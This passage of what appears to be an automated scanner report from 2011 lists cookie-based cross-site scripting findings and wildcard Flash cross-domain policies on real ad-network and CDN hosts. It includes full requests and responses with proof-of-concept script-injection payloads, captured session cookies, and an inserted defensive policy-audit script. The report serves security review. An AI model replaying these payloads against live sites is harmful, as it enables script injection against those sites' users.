<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=18a1a"-alert(1)-"9813aded66a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.120. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e793a"-alert(1)-"d2b2e260b31 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6291/9346/15214-2.js?cb=0.41656556632369757&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=e793a"-alert(1)-"d2b2e260b31; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; ses2=5032^1; csi2=3214995.js^1^1315096957^1315096957

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:33 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^1630e6e488d0ee79e0d5a80a7&9346^49; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111506; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2014

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3150789"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=e793a"-alert(1)-"d2b2e260b31\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.121. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [xa cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/getRemoteDomainCookies.js

Issue detail

The value of the xa cookie is copied into the HTML document as plain text between tags. The payload 6a7e7<script>alert(1)</script>407e0c8623c was submitted in the xa cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallback HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xa=n6a7e7<script>alert(1)</script>407e0c8623c

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
Expires: Sun, 04 Sep 2011 00:52:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:44 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallback("xa=n6a7e7<script>alert(1)</script>407e0c8623c; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

6. Flash cross-domain policy
There are 127 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
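The following is an added example, not taken from the report or from any of the listed ad networks: a dependency-free audit of crossdomain.xml bodies like the ones captured in this section. It lists every domain a policy trusts and flags the entries a reviewer should question, so the review recommended above can be applied to all 127 instances at once. The two sample policies are constructed here; the wildcard one mirrors the captured responses, and the hostnames in the scoped one are placeholders.

```javascript
// Added example (not from the report or any of the listed ad networks):
// a dependency-free audit of crossdomain.xml bodies like those captured
// in this section. It lists every domain the policy trusts and flags the
// entries a reviewer should question. The two sample policies are
// constructed here; the wildcard one mirrors the captured responses.

// Parse each <allow-access-from> element with a regex (sufficient for the
// flat structure of a policy file; no DOM parser is available in Node).
function auditCrossDomainPolicy(xml) {
  var trusted = [];
  var findings = [];
  var element = /<allow-access-from\b([^>]*)>/gi;
  var m;
  while ((m = element.exec(xml)) !== null) {
    var attrs = m[1];
    var domainMatch = /\bdomain\s*=\s*"([^"]*)"/i.exec(attrs);
    if (!domainMatch) continue;
    var domain = domainMatch[1];
    trusted.push(domain);
    if (domain === "*") {
      // Any site can read this host's responses with the victim's cookies.
      findings.push({ severity: "High", domain: domain,
        reason: "any domain may perform two-way interaction" });
    } else if (domain.charAt(0) === "*") {
      // "*.example.com" trusts every present and future subdomain.
      findings.push({ severity: "Medium", domain: domain,
        reason: "all subdomains under this suffix are trusted" });
    }
    if (/\bsecure\s*=\s*"false"/i.test(attrs)) {
      // On an HTTPS-served policy this admits SWFs loaded over plain HTTP.
      findings.push({ severity: "Medium", domain: domain,
        reason: "secure=\"false\" admits content loaded over HTTP" });
    }
  }
  // A header grant to "*" lets SWFs from any domain attach custom request
  // headers (Flash still refuses a fixed set of sensitive headers).
  if (/<allow-http-request-headers-from\b[^>]*\bdomain\s*=\s*"\*"/i.test(xml)) {
    findings.push({ severity: "High", domain: "*",
      reason: "any domain may send custom request headers" });
  }
  return { trusted: trusted, findings: findings };
}

// Constructed sample: the shape seen at a.tribalfusion.com and ad.afy11.net.
var WILDCARD_POLICY =
  '<?xml version="1.0"?>\n' +
  '<cross-domain-policy>\n' +
  '<allow-access-from domain="*" />\n' +
  '</cross-domain-policy>';

// Constructed sample of a scoped policy with two weaker-than-ideal entries.
var SCOPED_POLICY =
  '<?xml version="1.0"?>\n' +
  '<cross-domain-policy>\n' +
  '<allow-access-from domain="www.example.com" />\n' +
  '<allow-access-from domain="*.example.com" secure="false" />\n' +
  '</cross-domain-policy>';

console.log(auditCrossDomainPolicy(WILDCARD_POLICY)); // one High finding
console.log(auditCrossDomainPolicy(SCOPED_POLICY));   // two Medium findings
```

A wildcard is only acceptable on a host that serves nothing but public content and sets no session cookies; for the ad servers listed here that is usually the case, which is why a reviewer should check each host's cookie behaviour before accepting the High rating at face value.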


6.1. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:07 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 01:05:49 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 01:05:49 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.5. http://admeld.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.6. http://admin.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Sun, 04 Sep 2011 01:06:33 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.7. http://ads.undertone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT
ETag: "52206e9-fc-4abaaf7619480"
Content-Type: text/xml
Date: Sun, 04 Sep 2011 00:45:04 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:45:21 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.9. http://api.affinesystems.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.affinesystems.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.affinesystems.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:21:56 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Fri, 17 Jun 2011 17:02:20 GMT
ETag: "b8e352-cc-4a5eb593e5f00"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.10. http://api.bit.ly/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:45:49 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Wed, 25 May 2011 20:29:51 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:45:49 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.11. http://as.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.12. http://audit.303br.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://audit.303br.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: audit.303br.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Sun, 04 Sep 2011 00:45:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.13. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.14. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 01:21:59 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.15. http://c.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Sun, 04 Sep 2011 01:06:09 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.16. http://c5.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.17. http://c7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6536
Date: Sun, 04 Sep 2011 01:04:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.18. http://cdn.cinesport.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.cinesport.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.cinesport.com

Response

HTTP/1.0 200 OK
x-amz-id-2: aEaeSUpc60vkN5xGlJj7zIBJehC+5D6nUIMHOJ5M6rcQc8P9nk0vOx9i3FSBXAui
x-amz-request-id: 521035425F0CA074
Date: Tue, 22 Mar 2011 22:58:30 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Server: AmazonS3
Age: 4964
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 458df1119b180bde4aa261499705692ef0861449c6ed965fd28ed274ac9a0faf42b25cf1c8b5350f
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 4fbd9b3a8165adb6c7a206b9088f20b1.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.19. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:42:57 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.20. http://cdn.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Feb 2011 17:27:56 GMT
ETag: "a88001-199-49b64160f9f00"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 17664036
Expires: Sat, 11 Feb 2012 14:05:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.21. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 01:06:31 GMT
Date: Sun, 04 Sep 2011 01:06:31 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.22. http://cdn.visiblemeasures.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.visiblemeasures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

